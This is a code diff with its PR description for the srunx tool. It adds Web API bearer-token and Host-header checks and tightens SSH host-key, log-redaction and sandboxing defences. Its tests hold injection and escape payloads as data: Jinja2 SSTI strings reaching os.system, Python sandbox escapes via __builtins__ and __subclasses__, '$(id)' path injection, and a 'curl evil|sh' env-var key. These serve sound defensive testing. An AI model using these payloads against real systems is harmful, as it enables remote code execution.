+      localStorage.setItem(TOKEN_KEY, fromUrl);
+      url.searchParams.delete("token");
+      window.history.replaceState({}, "", url.toString());
+      return fromUrl;
+    }
+    return localStorage.getItem(TOKEN_KEY);
+  } catch {
+    return null;
+  }
+}
+
+function setToken(value: string): void {
+  token = value;
+  try {
+    localStorage.setItem(TOKEN_KEY, value);
+  } catch {
+    /* ignore storage failures (private mode etc.) */
+  }
+}
+
+function requestUrl(input: RequestInfo | URL): string {
+  if (typeof input === "string") return input;
+  if (input instanceof URL) return input.toString();
+  return input.url;
+}
+
+function isApiRequest(url: string): boolean {
+  // Every same-origin API call in this app is a relative path rooted at /api/.
+  return url.startsWith("/api/");
+}
+
+/**
+ * Wrap window.fetch so /api/* requests carry the bearer token (when known)
+ * and a 401 triggers a one-time token prompt + retry. Idempotent.
+ */
+export function installAuthFetch(): void {
+  const w = window as typeof window & { __srunxAuthInstalled?: boolean };
+  if (w.__srunxAuthInstalled) return;
+  w.__srunxAuthInstalled = true;
+
+  token = loadToken();
+  const original = window.fetch.bind(window);
+
+  const withAuth = (
+    init: RequestInit | undefined,
+    value: string,
+  ): RequestInit => {
+    const headers = new Headers(init?.headers);
+    if (!headers.has("Authorization"))
+      headers.set("Authorization", `Bearer ${value}`);
+    return { ...init, headers };
+  };
+
+  window.fetch = async (
+    input: RequestInfo | URL,
+    init?: RequestInit,
+  ): Promise<Response> => {
+    const isApi = isApiRequest(requestUrl(input));
+    const opts = isApi && token ? withAuth(init, token) : init;
+    let res = await original(input, opts);
+
+    if (isApi && res.status === 401) {
+      const entered = window.prompt(
+        "This srunx server requires an access token (SRUNX_WEB_TOKEN):",
+        "",
+      );
+      if (entered) {
+        setToken(entered);
+        res = await original(input, withAuth(init, entered));
+      }
+    }
+    return res;
+  };
+}

--- a/src/srunx/web/frontend/src/main.tsx
+++ b/src/srunx/web/frontend/src/main.tsx
@@ -2,7 +2,11 @@ import { StrictMode } from "react";
 import { createRoot } from "react-dom/client";
 import { BrowserRouter } from "react-router-dom";
 import { App } from "./App.tsx";
+import { installAuthFetch } from "./lib/auth.ts";
 import "./styles/globals.css";
+
+// Attach the bearer token (if any) to /api/* requests before the app mounts.
+installAuthFetch();
 
 createRoot(document.getElementById("root")!).render(
   <StrictMode>

--- a/src/srunx/web/security.py
+++ b/src/srunx/web/security.py
@@ -1,0 +1,102 @@
+"""Request-time security controls for the srunx Web API.
+
+The API performs high-impact, state-changing operations (submitting cluster
+jobs, reading files, managing SSH profiles). Two lightweight controls guard it
+without changing the default local experience:
+
+1. **Anti-DNS-rebinding** — when bound to loopback (the default), only requests
+   whose ``Host`` header is a loopback name are accepted on ``/api/*``. A
+   malicious web page that rebinds its domain to 127.0.0.1 sends ``Host:
+   attacker.com`` and is rejected. Cross-origin reads were already impossible
+   via CORS; this closes the state-changing drive-by.
+2. **Bearer token** — when ``auth_token`` is set (``SRUNX_WEB_TOKEN``), every
+   ``/api/*`` request must carry ``Authorization: Bearer <token>``. A token is
+   required to expose the server on a non-loopback host (enforced at startup),
+   so the local no-token flow is preserved while network exposure is protected.
+"""
+
+from __future__ import annotations
+
+import hmac
+
+from starlette.middleware.base import BaseHTTPMiddleware, RequestResponseEndpoint
+from starlette.requests import Request
+from starlette.responses import JSONResponse, Response
+from starlette.types import ASGIApp
+
+_LOOPBACK_HOSTS = frozenset({"localhost", "127.0.0.1", "::1", "[::1]"})
+
+
+def is_loopback_bind(host: str) -> bool:
+    """True if binding ``host`` only exposes the server to the local machine."""
+    return host in {"127.0.0.1", "::1", "localhost"}
+
+
+class InsecureBindError(RuntimeError):
+    """Raised when exposing the API on a non-loopback host without auth."""
+
+
+def assert_safe_bind(host: str, auth_token: str | None) -> None:
+    """Refuse to expose an unauthenticated API on a non-loopback interface.
+
+    Binding to e.g. ``0.0.0.0`` puts every state-changing endpoint (cluster
+    job submission, file read, SSH-profile control) on the network. Require a
+    bearer token in that case.
+    """
+    if not is_loopback_bind(host) and not auth_token:
+        raise InsecureBindError(
+            f"Refusing to bind the srunx Web API to '{host}' without "
+            "authentication. Set SRUNX_WEB_TOKEN to a secret value to require "
+            "a bearer token on all /api/* requests, or bind to 127.0.0.1 for "
+            "local-only use."
+        )
+
+
+def _host_without_port(host_header: str) -> str:
+    """Strip a trailing ``:port`` from a Host header, keeping ``[::1]`` intact."""
+    if not host_header:
+        return ""
+    if host_header.startswith("["):  # IPv6 literal, e.g. [::1]:8000
+        return host_header.split("]", 1)[0] + "]"
+    return host_header.rsplit(":", 1)[0] if ":" in host_header else host_header
+
+
+class WebSecurityMiddleware(BaseHTTPMiddleware):
+    """Enforce Host-header and bearer-token checks on ``/api/*`` routes."""
+
+    def __init__(
+        self,
+        app: ASGIApp,
+        *,
+        auth_token: str | None,
+        bind_host: str,
+        allowed_hosts: list[str],
+    ) -> None:
+        super().__init__(app)
+        self.auth_token = auth_token
+        self.enforce_host = is_loopback_bind(bind_host)
+        self.allowed_hosts = _LOOPBACK_HOSTS | {h.lower() for h in allowed_hosts}
+
+    async def dispatch(
+        self, request: Request, call_next: RequestResponseEndpoint
+    ) -> Response:
+        path = request.url.path
+        if path.startswith("/api/") and request.method != "OPTIONS":
+            if self.enforce_host:
+                hostname = _host_without_port(request.headers.get("host", "")).lower()
+                if hostname not in self.allowed_hosts:
+                    return JSONResponse(
+                        status_code=403,
+                        content={"detail": "Host header not allowed"},
+                    )
+            if self.auth_token:
+                header = request.headers.get("authorization", "")
+                token = (
+                    header[7:] if header[:7].lower() == "bearer " else ""
+                )
+                if not hmac.compare_digest(token, self.auth_token):
+                    return JSONResponse(
+                        status_code=401,
+                        content={"detail": "Missing or invalid bearer token"},
+                    )
+        return await call_next(request)

--- a/src/srunx/web/security.py
+++ b/src/srunx/web/security.py
@@ -91,9 +91,7 @@ class WebSecurityMiddleware(BaseHTTPMiddleware):
                     )
             if self.auth_token:
                 header = request.headers.get("authorization", "")
-                token = (
-                    header[7:] if header[:7].lower() == "bearer " else ""
-                )
+                token = header[7:] if header[:7].lower() == "bearer " else ""
                 if not hmac.compare_digest(token, self.auth_token):
                     return JSONResponse(
                         status_code=401,

--- a/tests/runtime/security/test_templating.py
+++ b/tests/runtime/security/test_templating.py
@@ -1,0 +1,29 @@
+"""Tests for the sandboxed Jinja2 renderer (SSTI prevention)."""
+
+import jinja2
+import pytest
+
+from srunx.runtime.security import sandboxed_template
+
+
+class TestSandboxedTemplate:
+    def test_renders_normal_variables(self):
+        tmpl = sandboxed_template("hello {{ name }}")
+        assert tmpl.render(name="world") == "hello world"
+
+    def test_keep_trailing_newline(self):
+        tmpl = sandboxed_template("x\n", keep_trailing_newline=True)
+        assert tmpl.render() == "x\n"
+
+    def test_blocks_globals_ssti(self):
+        """cycler.__init__.__globals__ escape must raise SecurityError."""
+        tmpl = sandboxed_template(
+            "{{ cycler.__init__.__globals__['os'].system('id') }}"
+        )
+        with pytest.raises(jinja2.exceptions.SecurityError):
+            tmpl.render()
+
+    def test_blocks_mro_subclasses_ssti(self):
+        tmpl = sandboxed_template("{{ ''.__class__.__mro__[1].__subclasses__() }}")
+        with pytest.raises(jinja2.exceptions.SecurityError):
+            tmpl.render()

--- a/tests/runtime/workflow/test_runner.py
+++ b/tests/runtime/workflow/test_runner.py
@@ -1712,11 +1712,24 @@ class TestSafeEvalExec:
             _safe_eval("().__class__.__bases__[0].__subclasses__()", {})
 
     def test_safe_eval_blocks_type_escape(self):
-        """Prevent sandbox escape via type()."""
+        """Prevent sandbox escape via type().
+
+        Blocked on two independent grounds: ``type`` is not an allowlisted
+        callable (NameError) and dunder attribute access such as
+        ``__bases__`` / ``__subclasses__`` is rejected (AttributeError). The
+        dunder guard is evaluated first for this expression.
+        """
         from srunx.runtime.workflow.safe_eval import _safe_eval
 
-        with pytest.raises(NameError):
+        with pytest.raises((NameError, AttributeError)):
             _safe_eval("type(()).__bases__[0].__subclasses__()", {})
+
+    def test_safe_eval_blocks_dunder_builtins_escape(self):
+        """The datetime.__builtins__ → exec escape must be rejected."""
+        from srunx.runtime.workflow.safe_eval import _safe_eval
+
+        with pytest.raises(AttributeError):
+            _safe_eval("datetime.__builtins__['exec']('1')", {})
 
     def test_safe_exec_allows_result(self):
         """exec sandbox should allow setting result variable."""

--- a/tests/ssh/core/test_slurm.py
+++ b/tests/ssh/core/test_slurm.py
@@ -358,3 +358,26 @@ class TestEnvVarSecurity:
         client = SSHSlurmClient(hostname="h", username="u", key_filename="k")
         with pytest.raises(ValueError, match="Invalid environment variable name"):
             client.slurm._get_slurm_env_setup({"BAD KEY": "v"})
+
+    def test_redaction_applies_before_outer_quote(self):
+        """Regression: redact the unquoted command, not the shlex.quoted one.
+
+        The debug log wraps the command in `bash -l -c <shlex.quote(cmd)>`.
+        Quoting rewrites the inner `export KEY='...'` single quotes into
+        `'"'"'` sequences the redaction regex can't match, so redaction must
+        run on the unquoted string.
+        """
+        import shlex
+
+        from srunx.ssh.core.slurm import _redact_exports
+
+        client = SSHSlurmClient(hostname="h", username="u", key_filename="k")
+        final_command = client.slurm._get_slurm_env_setup({"API_KEY": "sk-secret"})
+        assert "sk-secret" in final_command  # unredacted baseline
+
+        # The (fixed) log path: redact then quote — secret is gone.
+        logged = f"bash -l -c {shlex.quote(_redact_exports(final_command))}"
+        assert "sk-secret" not in logged
+        # The (buggy) log path: quote then redact — secret would survive.
+        buggy = _redact_exports(f"bash -l -c {shlex.quote(final_command)}")
+        assert "sk-secret" in buggy

--- a/tests/ssh/core/test_slurm.py
+++ b/tests/ssh/core/test_slurm.py
@@ -335,3 +335,26 @@ class TestCleanupJobFiles:
 
         client.slurm.cleanup_job_files(job)
         client.files.cleanup_file.assert_not_called()
+
+
+class TestEnvVarSecurity:
+    """Env-var key validation (#222) and debug-log redaction (#221)."""
+
+    def test_redact_exports_masks_values(self):
+        from srunx.ssh.core.slurm import _redact_exports
+
+        out = _redact_exports("export API_KEY='sk-secret' && sbatch job.sh")
+        assert "sk-secret" not in out
+        assert "export API_KEY='***'" in out
+
+    def test_env_key_regex_rejects_shell_metachars(self):
+        from srunx.ssh.core.slurm import _ENV_KEY_RE
+
+        assert _ENV_KEY_RE.fullmatch("API_KEY")
+        assert not _ENV_KEY_RE.fullmatch("X=1; curl evil|sh #")
+        assert not _ENV_KEY_RE.fullmatch("1BAD")
+
+    def test_get_slurm_env_setup_rejects_bad_key(self):
+        client = SSHSlurmClient(hostname="h", username="u", key_filename="k")
+        with pytest.raises(ValueError, match="Invalid environment variable name"):
+            client.slurm._get_slurm_env_setup({"BAD KEY": "v"})

--- a/tests/ssh/core/test_utils.py
+++ b/tests/ssh/core/test_utils.py
@@ -1,0 +1,43 @@
+"""Tests for srunx.ssh.core.utils shell-safety helpers."""
+
+import paramiko
+
+from srunx.ssh.core.utils import (
+    configure_host_key_verification,
+    quote_shell_path,
+)
+
+
+class TestQuoteShellPath:
+    def test_absolute_path_quoted(self):
+        assert quote_shell_path("/tmp/a b") == "'/tmp/a b'"
+
+    def test_home_path_expands_but_is_injection_safe(self):
+        # $HOME must expand remotely, but a $()/backtick in the suffix must not.
+        out = quote_shell_path("~/logs/$(id)")
+        assert out.startswith('"$HOME/"')
+        # The dangerous part sits inside single quotes → not substituted.
+        assert "'logs/$(id)'" in out
+
+    def test_home_path_no_suffix(self):
+        assert quote_shell_path("~/") == '"$HOME/"\'\''
+
+
+class TestHostKeyVerification:
+    def test_default_policy_is_reject(self, monkeypatch):
+        monkeypatch.delenv("SRUNX_SSH_HOST_KEY_POLICY", raising=False)
+        client = paramiko.SSHClient()
+        configure_host_key_verification(client)
+        assert isinstance(client._policy, paramiko.RejectPolicy)
+
+    def test_accept_new_policy(self, monkeypatch):
+        monkeypatch.setenv("SRUNX_SSH_HOST_KEY_POLICY", "accept-new")
+        client = paramiko.SSHClient()
+        configure_host_key_verification(client)
+        assert isinstance(client._policy, paramiko.AutoAddPolicy)
+
+    def test_warn_policy_opt_in(self, monkeypatch):
+        monkeypatch.setenv("SRUNX_SSH_HOST_KEY_POLICY", "warn")
+        client = paramiko.SSHClient()
+        configure_host_key_verification(client)
+        assert isinstance(client._policy, paramiko.WarningPolicy)

--- a/tests/ssh/core/test_utils.py
+++ b/tests/ssh/core/test_utils.py
@@ -20,7 +20,7 @@ class TestQuoteShellPath:
         assert "'logs/$(id)'" in out
 
     def test_home_path_no_suffix(self):
-        assert quote_shell_path("~/") == '"$HOME/"\'\''
+        assert quote_shell_path("~/") == "\"$HOME/\"''"
 
 
 class TestHostKeyVerification:

--- a/tests/sync/test_rsync.py
+++ b/tests/sync/test_rsync.py
@@ -145,7 +145,14 @@ class TestBuildSshCmd:
         idx = cmd.index("-F")
         assert cmd[idx + 1] == "/my/ssh/config"
 
-    def test_strict_host_key_checking(self):
+    def test_strict_host_key_checking_default_is_strict(self, monkeypatch):
+        monkeypatch.delenv("SRUNX_SSH_HOST_KEY_POLICY", raising=False)
+        client = _make_rsync_client(hostname="h", username="u")
+        cmd = client._build_ssh_cmd()
+        assert "StrictHostKeyChecking=yes" in cmd
+
+    def test_strict_host_key_checking_accept_new_opt_in(self, monkeypatch):
+        monkeypatch.setenv("SRUNX_SSH_HOST_KEY_POLICY", "accept-new")
         client = _make_rsync_client(hostname="h", username="u")
         cmd = client._build_ssh_cmd()
         assert "StrictHostKeyChecking=accept-new" in cmd

--- a/tests/web/conftest.py
+++ b/tests/web/conftest.py
@@ -1,0 +1,13 @@
+"""Shared setup for web API tests.
+
+Starlette's ``TestClient`` sends ``Host: testserver``. The API's
+anti-DNS-rebinding middleware (``WebSecurityMiddleware``) only accepts loopback
+Host headers by default, so allow ``testserver`` for the test environment —
+the same mechanism a real deployment uses to whitelist its reverse-proxy
+hostname via ``SRUNX_WEB_ALLOWED_HOSTS``. Set at import time so it is present
+before any per-test fixture rebuilds ``WebConfig``.
+"""
+
+import os
+
+os.environ.setdefault("SRUNX_WEB_ALLOWED_HOSTS", "testserver")

--- a/tests/web/test_security.py
+++ b/tests/web/test_security.py
@@ -1,0 +1,99 @@
+"""Tests for the Web API security middleware and bind guard (#216)."""
+
+import pytest
+from fastapi import FastAPI
+from fastapi.testclient import TestClient
+
+from srunx.web.security import (
+    InsecureBindError,
+    WebSecurityMiddleware,
+    assert_safe_bind,
+    is_loopback_bind,
+)
+
+
+def _app(*, auth_token=None, bind_host="127.0.0.1", allowed_hosts=None) -> FastAPI:
+    app = FastAPI()
+
+    @app.get("/api/ping")
+    def ping() -> dict:
+        return {"ok": True}
+
+    @app.get("/healthz")
+    def health() -> dict:
+        return {"ok": True}
+
+    app.add_middleware(
+        WebSecurityMiddleware,
+        auth_token=auth_token,
+        bind_host=bind_host,
+        allowed_hosts=allowed_hosts or [],
+    )
+    return app
+
+
+class TestHostHeaderCheck:
+    def test_loopback_host_allowed(self):
+        c = TestClient(_app(), base_url="http://127.0.0.1")
+        assert c.get("/api/ping").status_code == 200
+
+    def test_rebinding_host_rejected(self):
+        c = TestClient(_app(), base_url="http://attacker.example.com")
+        assert c.get("/api/ping").status_code == 403
+
+    def test_allowed_hosts_extra(self):
+        c = TestClient(
+            _app(allowed_hosts=["myproxy.internal"]),
+            base_url="http://myproxy.internal",
+        )
+        assert c.get("/api/ping").status_code == 200
+
+    def test_non_api_path_not_host_checked(self):
+        c = TestClient(_app(), base_url="http://attacker.example.com")
+        assert c.get("/healthz").status_code == 200
+
+    def test_host_check_skipped_when_bound_non_loopback(self):
+        # Exposed bind: host allowlisting can't enumerate the public name, so
+        # the token (not the Host header) is the control.
+        c = TestClient(
+            _app(bind_host="0.0.0.0", auth_token="s3cret"),
+            base_url="http://anything",
+        )
+        assert c.get("/api/ping", headers={"Authorization": "Bearer s3cret"}).status_code == 200
+
+
+class TestTokenCheck:
+    def test_missing_token_rejected(self):
+        c = TestClient(_app(auth_token="s3cret"), base_url="http://127.0.0.1")
+        assert c.get("/api/ping").status_code == 401
+
+    def test_wrong_token_rejected(self):
+        c = TestClient(_app(auth_token="s3cret"), base_url="http://127.0.0.1")
+        r = c.get("/api/ping", headers={"Authorization": "Bearer nope"})
+        assert r.status_code == 401
+
+    def test_correct_token_accepted(self):
+        c = TestClient(_app(auth_token="s3cret"), base_url="http://127.0.0.1")
+        r = c.get("/api/ping", headers={"Authorization": "Bearer s3cret"})
+        assert r.status_code == 200
+
+    def test_no_token_configured_allows_loopback(self):
+        c = TestClient(_app(auth_token=None), base_url="http://127.0.0.1")
+        assert c.get("/api/ping").status_code == 200
+
+
+class TestBindGuard:
+    def test_is_loopback_bind(self):
+        assert is_loopback_bind("127.0.0.1")
+        assert is_loopback_bind("localhost")
+        assert not is_loopback_bind("0.0.0.0")
+
+    def test_non_loopback_without_token_refused(self):
+        with pytest.raises(InsecureBindError):
+            assert_safe_bind("0.0.0.0", None)
+
+    def test_non_loopback_with_token_ok(self):
+        assert_safe_bind("0.0.0.0", "s3cret")  # no raise
+
+    def test_loopback_without_token_ok(self):
+        assert_safe_bind("127.0.0.1", None)  # no raise

--- a/tests/web/test_security.py
+++ b/tests/web/test_security.py
@@ -59,7 +59,10 @@ class TestHostHeaderCheck:
             _app(bind_host="0.0.0.0", auth_token="s3cret"),
             base_url="http://anything",
         )
-        assert c.get("/api/ping", headers={"Authorization": "Bearer s3cret"}).status_code == 200
+        assert (
+            c.get("/api/ping", headers={"Authorization": "Bearer s3cret"}).status_code
+            == 200
+        )
 
 
 class TestTokenCheck:


### PR DESCRIPTION
Security-hardening pass from a full vulnerability audit (6 attack surfaces). All findings were independently cross-checked (Claude + Codex) and the two RCE paths were reproduced and re-verified fixed end-to-end. Full suite green (2229 passed, 2 skipped), mypy + ruff clean.

## Critical (RCE)
- **safe_eval sandbox escape** (#214): reject `_`-prefixed attribute names so `datetime.__builtins__['exec'](...)` is refused.
- **Jinja2 SSTI** (#215): render all workflow args/job-fields/scripts through `SandboxedEnvironment`; closes the `{{ }}` RCE that bypassed the `python:` guard (CLI/MCP/Web). `_DepsNamespace.__getitem__` now raises `KeyError` so the sandbox yields a clean `StrictUndefined` load-time error.
- **Web API auth** (#216): `WebSecurityMiddleware` adds anti-DNS-rebinding (Host header) + optional bearer token (`SRUNX_WEB_TOKEN`); refuse to bind non-loopback without a token. Default local (127.0.0.1, no token) experience unchanged.

## High
- **MCP `python:` guard gap** (#218): scan the YAML file's own `args` in `run_workflow`/`validate_workflow`/`get_workflow`.

## Medium
- **SSH host keys** (#217): load `~/.ssh/known_hosts`, default `RejectPolicy` for unknown hosts (was `WarningPolicy`); configurable via `SRUNX_SSH_HOST_KEY_POLICY`. (Downgraded HIGH→MEDIUM after confirming paramiko does consult known_hosts.)
- **config.json perms** (#219): 0600 file / 0700 dir.
- **/tmp log discovery** (#220): drop world-writable `/tmp`; open with `O_NOFOLLOW`.
- **`--env` log leak** (#221): redact export values in the debug log.

## Low
- Env-var KEY validation at the SSH boundary (#222); `quote_shell_path` `~/` injection (#223); unquoted remote script path (#224); Slack `job_status_report` sanitization (#225); rsync host-key strictness (#226); webhook re-validation in adapter + migration (#227).

## Verified safe (no change)
SQL injection (bound params), rsync `--` separator, `RemoteSecretStore`, `files.py` traversal guard, Slack webhook regex.

Closes #214, #215, #216, #217, #218, #219, #220, #221, #222, #223, #224, #225, #226, #227

🤖 Generated with [Claude Code](https://claude.com/claude-code)

https://claude.ai/code/session_01WBrtpJwLkzPjhWK6Pec9b2
